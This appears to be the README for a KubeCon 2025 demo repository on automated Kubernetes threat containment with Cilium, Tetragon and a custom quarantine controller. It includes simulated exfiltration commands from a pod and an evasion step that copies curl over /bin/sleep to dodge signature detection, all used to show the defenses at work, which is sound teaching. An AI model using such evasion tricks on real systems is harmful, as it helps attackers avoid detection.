This repository contains the demonstration code and manifests for the KubeCon CiliumCon North America 2025 talk: "Containing Wildfires in a Sprawling Multi-Cluster Network: The Network's Immune System".
It demonstrates a closed-loop security response system that transforms a passive network into an active immune system using Cilium, Tetragon, and a custom automation controller.
Traditional security relies on manual incident response, which is often too slow to stop lateral movement. This demo introduces a multi-layered automated defense:
- The Reflex (Tetragon): A kernel-level `TracingPolicy` that executes in milliseconds to instantly neutralize known, high-confidence threats (e.g., accessing unauthorized external domains).
- The Brain (Quarantine Controller): A custom controller that analyzes behavioral context to catch advanced evasion attempts that bypass simple signature-based reflexes. It provides lasting containment by "shrink-wrapping" the compromised workload with a Cilium Network Policy.
While this demonstration is built and documented using Google Cloud Platform (GKE) and Google Artifact Registry (GAR) for ease of reproduction, the underlying architectural patterns—using eBPF for detection (Tetragon) and enforcement (Cilium)—are platform-agnostic. They can be adapted to run on any cloud provider or on-premises Kubernetes environment that supports Cilium. Note that running the demo setup described here will incur cloud costs.
To reproduce this demo, the following tools must be installed on the operator's workstation:
- Google Cloud CLI (`gcloud`) - For provisioning GKE infrastructure (if using GCP).
- `kubectl` - For interacting with the Kubernetes API.
- `helm` - Required for installing Tetragon.
- Docker Desktop or equivalent - For building and pushing the controller image.
- Cilium CLI - For installing and managing Cilium and Hubble.
This guide assumes two Kubernetes clusters: West (Attacker/Victim) and East (Internal Backend).
- Provision Clusters: Create two GKE Standard clusters in different regions (e.g., `us-west1` and `us-east1`).
  - Critical: Ensure Dataplane V2 is disabled (`--no-enable-dataplane-v2`) to allow installation of standard open-source Cilium.
  - Tip: Rename the kubeconfig contexts to `gke-west` and `gke-east` for ease of use; see the provisioning sketch below.
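The commands below are a hedged sketch of this step, assuming default node pools; adjust project, machine type, node count, and networking options to your environment.

```bash
# Hedged sketch: example provisioning commands; adjust to your environment.
gcloud container clusters create gke-west --region us-west1 \
  --num-nodes 1 --no-enable-dataplane-v2
gcloud container clusters create gke-east --region us-east1 \
  --num-nodes 1 --no-enable-dataplane-v2

# Fetch credentials and rename the kubeconfig contexts for convenience.
gcloud container clusters get-credentials gke-west --region us-west1
kubectl config rename-context "$(kubectl config current-context)" gke-west
gcloud container clusters get-credentials gke-east --region us-east1
kubectl config rename-context "$(kubectl config current-context)" gke-east
```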
- Install Cilium & Enable Cluster Mesh: Install Cilium with unique cluster IDs and enable the mesh interfaces.

```bash
# 1. Install on West (ID 1)
cilium install --context gke-west --version 1.18.3 \
  --set cluster.name=gke-west \
  --set cluster.id=1 \
  --set ipam.mode=kubernetes \
  --set hubble.relay.enabled=true \
  --set hubble.ui.enabled=true
cilium clustermesh enable --context gke-west --service-type LoadBalancer

# 2. Install on East (ID 2)
cilium install --context gke-east --version 1.18.3 \
  --set cluster.name=gke-east \
  --set cluster.id=2 \
  --set ipam.mode=kubernetes \
  --set hubble.relay.enabled=true \
  --set hubble.ui.enabled=true
cilium clustermesh enable --context gke-east --service-type LoadBalancer
```
> Wait until the `clustermesh-apiserver` service in both clusters has an external IP before proceeding.
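One way to confirm this, sketched below, is to re-run the following until the `EXTERNAL-IP` column is populated in both clusters:

```bash
# Re-run until EXTERNAL-IP shows an address in both clusters.
kubectl get svc clustermesh-apiserver -n kube-system --context gke-west
kubectl get svc clustermesh-apiserver -n kube-system --context gke-east
```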
- Synchronize Certificate Authority (CA): For mTLS to work across clusters, they must share a root CA. Export the CA from the West cluster and apply it to the East cluster.

```bash
# 1. Extract the CA from the West cluster.
kubectl get secret -n kube-system cilium-ca --context gke-west -o yaml > cilium-ca.yaml

# 2. Sanitize the secret (remove unique metadata).
# Note: The empty '' argument to sed -i is required on macOS; remove it on Linux.
sed -i '' '/creationTimestamp:/d' cilium-ca.yaml
sed -i '' '/resourceVersion:/d' cilium-ca.yaml
sed -i '' '/uid:/d' cilium-ca.yaml

# 3. Apply the CA to the East cluster and restart Cilium to pick it up.
kubectl apply -f cilium-ca.yaml --context gke-east
kubectl delete pod -n kube-system -l k8s-app=cilium --context gke-east
```
- Connect Clusters: Establish the mesh connection.

```bash
cilium clustermesh connect --context gke-west --destination-context gke-east

# Verify the connection.
cilium clustermesh status --context gke-west --wait
```
- Install Tetragon: Deploy Tetragon into the `kube-system` namespace of the West cluster (the active defense cluster).

```bash
helm repo add cilium https://helm.cilium.io/
helm repo update
helm install tetragon cilium/tetragon -n kube-system --kube-context gke-west
```
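Before continuing, it is worth confirming that the Tetragon agents are running. A minimal check, assuming the chart's default DaemonSet name `tetragon`:

```bash
# Wait for the Tetragon DaemonSet rollout to complete
# (assumes the Helm chart's default DaemonSet name "tetragon").
kubectl rollout status ds/tetragon -n kube-system --context gke-west
```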
- Configure Environment: Export the necessary variables for the GCP environment in the terminal:

```bash
export GCP_PROJECT_ID="gcp-project-id"
export GCP_REGION="us-west1"
# Name of the Google Artifact Registry (GAR) container image repository.
export GAR_REPO_NAME="gar-repo-name"
```
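If the Artifact Registry repository does not exist yet, it can be created and Docker authentication configured roughly as in the sketch below; the repository format and location must match what `setup.sh` expects.

```bash
# Hedged sketch: create the GAR repository (if missing) and configure
# Docker authentication for it.
gcloud artifacts repositories create "$GAR_REPO_NAME" \
  --repository-format=docker \
  --location="$GCP_REGION" \
  --project="$GCP_PROJECT_ID"
gcloud auth configure-docker "${GCP_REGION}-docker.pkg.dev"
```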
- Build and Deploy Controller: Update the required variables in the provided setup script, then run it. The script builds the Python controller image, pushes it to the container registry, and generates the Kubernetes manifests with the correct image tags.

```bash
./setup.sh
```
- Apply Manifests: Deploy the components to the appropriate clusters.
  - West Cluster (Active Defense):

    ```bash
    kubectl apply -f manifests/vaccine.yaml --context gke-west
    kubectl apply -f manifests/controller.yaml --context gke-west
    kubectl apply -f manifests/frontend.yaml --context gke-west

    # Stub service for DNS resolution of the remote backend.
    kubectl apply -f manifests/backend-service-stub.yaml --context gke-west
    ```

  - East Cluster (Remote Backend):

    ```bash
    kubectl apply -f manifests/backend.yaml --context gke-east
    ```
This section details the step-by-step flow to demonstrate the "Reflex vs. Brain" capabilities.
The architecture relies on a "Nerve Conduit" to pipe Tetragon JSON events from the secure kernel stream to the user-space controller.
- Start Controller Logs (Terminal 1): Monitor the decision-making engine.

```bash
kubectl logs -f -n kube-system -l app=quarantine-controller --context gke-west
```
- Establish Nerve Conduit (Terminal 2 - Background): Keep this running throughout the demo.

```bash
# Open a port-forward to the controller service.
kubectl port-forward -n kube-system svc/quarantine-svc 5000:80 --context gke-west &
sleep 5

# Pipe Tetragon events to the controller.
# IFS= read -r prevents corruption of complex JSON events.
kubectl logs -n kube-system -l app.kubernetes.io/name=tetragon -c export-stdout -f --context gke-west | \
  grep --line-buffered "^{" | \
  while IFS= read -r line; do
    curl -s -X POST -H "Content-Type: application/json" -d "$line" http://localhost:5000/tetragon-hook > /dev/null
  done &
```
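Optionally, smoke-test the conduit before starting the scenarios. The payload below is a placeholder rather than a real Tetragon event, so the controller may ignore or reject it; any HTTP response still confirms that the port-forward and hook endpoint are reachable.

```bash
# Hedged sketch: reachability check only; the body is NOT a real Tetragon
# event, so the controller may reject it.
curl -s -o /dev/null -w "%{http_code}\n" -X POST \
  -H "Content-Type: application/json" \
  -d '{"smoke_test": true}' \
  http://localhost:5000/tetragon-hook
```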
- Open Attacker Console (Terminal 3): This is where all attack scenarios will be executed.
Enhance visibility by setting up real-time monitoring tools.
- Launch Hubble UI (Browser): Visualize network flows and policy verdicts in real time.

  ```bash
  cilium hubble ui --context gke-west
  ```

  - Open `http://localhost:12000` in the browser.
  - Select the `demo` namespace from the top-left dropdown menu.
- Start Label Watcher (Terminal 4): Observe the exact moment the quarantine label is applied to the Pod.

```bash
watch -n 0.1 "kubectl get pod -n demo -l app=frontend --show-labels --context gke-west"
```
Open Attacker Console (Terminal 3): Set a variable for the target pod to make subsequent commands easy to copy-paste.

```bash
export POD=$(kubectl get pod -n demo -l app=frontend -o jsonpath="{.items[0].metadata.name}" --context gke-west)
```

Verify that cross-cluster traffic works under normal conditions. Show that the network is currently wide open: the attacker can reach internal services AND exfiltrate data to the public internet.

```bash
kubectl exec -it -n demo $POD --context gke-west -- curl -s backend-global.demo.svc.cluster.local
```

Expected Result: Successful HTTP response from Nginx (`backend-global`).

Hubble Observation: Green flows appear from `frontend` to `backend-global`.
Note: Without enforced security measures, the attacker can also exfiltrate data, as shown below.

```bash
kubectl exec -it -n demo $POD --context gke-west -- curl -I https://www.example.com
# Result: HTTP/2 200 (Success! Data exfiltrated.)
```

Demonstrate instant, millisecond-level blocking of known malicious indicators using a `TracingPolicy`; a sketch of such a policy follows the scenario steps below.
- Activate the Reflex: Apply the Tetragon policy to the West cluster.

```bash
kubectl apply -f manifests/reflex.yaml --context gke-west
```
- Execute Attack: Attempt exfiltration.

```bash
kubectl exec -it -n demo $POD --context gke-west -- curl -I https://www.example.com
```
Expected Result: Immediate termination with exit code 137 (SIGKILL). The process is stopped by the kernel before it can open a network connection.
Hubble Observation: No flows generated (process died before network activity).
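For reference, the general shape of such a reflex policy is sketched below, modeled on the upstream Tetragon enforcement examples (kill a process on `tcp_connect` to a destination outside an allow-listed range). The actual `manifests/reflex.yaml` in this repository may hook different functions and use different match values.

```bash
# Hedged sketch of a Tetragon TracingPolicy in the spirit of
# manifests/reflex.yaml; hooks and CIDRs here are illustrative only.
kubectl apply --context gke-west -f - <<'EOF'
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: reflex-sigkill-egress
spec:
  kprobes:
    - call: "tcp_connect"          # kernel TCP connect path
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchArgs:
            - index: 0
              operator: "NotDAddr" # destination outside the allowed ranges
              values:
                - "127.0.0.1"
                - "10.0.0.0/8"     # illustrative in-cluster CIDR
          matchActions:
            - action: Sigkill      # kill the process before it connects
EOF
```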
Demonstrate how attackers can bypass simple signature-based detection by leveraging authorized system binaries (e.g., copying `curl` over `/bin/sleep` so the exfiltration tool masquerades as an allowed binary, then executing it via an interactive shell).
```bash
# 1. Execute Evasion Attack.
kubectl exec -it -n demo $POD --context gke-west -- /bin/sh -c "cp /usr/bin/curl /bin/sleep && /bin/sleep -I https://www.example.com"
```

Expected Result: The command hangs indefinitely.
Observation (Terminal 1): The controller detects the anomalous parent process (`/bin/sh` launching `/bin/sleep`) and applies the quarantine label.

Label Watcher (Terminal 4): The `quarantine=true` label appears on the Pod.
Prove that the compromised Pod is now fully isolated from the network.
```bash
# Attempt legitimate lateral movement again.
kubectl exec -it -n demo $POD --context gke-west -- curl -m 2 backend-global.demo.svc.cluster.local
```

Expected Result: Connection timeout. The `CiliumClusterwideNetworkPolicy` has successfully "shrink-wrapped" the compromised workload.
Hubble Observation: New flows from frontend to backend-global are RED, indicating Verdict: DROPPED (Policy).
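The lasting containment can be expressed as a deny-all policy keyed on the quarantine label. The sketch below shows one way to write it with Cilium deny rules; the policy actually generated by the controller may differ in name and structure.

```bash
# Hedged sketch of the "shrink-wrap" lockdown; the controller's generated
# CiliumClusterwideNetworkPolicy may differ in name and structure.
kubectl apply --context gke-west -f - <<'EOF'
apiVersion: cilium.io/v2
kind: CiliumClusterwideNetworkPolicy
metadata:
  name: quarantine-lockdown
spec:
  endpointSelector:
    matchLabels:
      quarantine: "true"   # label applied by the quarantine controller
  ingressDeny:
    - fromEntities:
        - all              # drop all inbound traffic
  egressDeny:
    - toEntities:
        - all              # drop all outbound traffic
EOF
```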
Anmol Krishan Sachdeva
LinkedIn: @greatdevaks | Twitter: @greatdevaks
Paras Mamgain
LinkedIn: @parasmamgain | Twitter: @mamgainparas
- The content and views presented during the session are the authors' own and not those of any organization they are associated with or employed by.
- Some images used in the presentation might be generated with the assistance of artificial intelligence. Such illustrative representations might not convey accurate or factually correct information.
- The code shown in this repository is for illustration and educational purposes only.
- The code is not production-grade; error handling, security, and scalability are not fully addressed.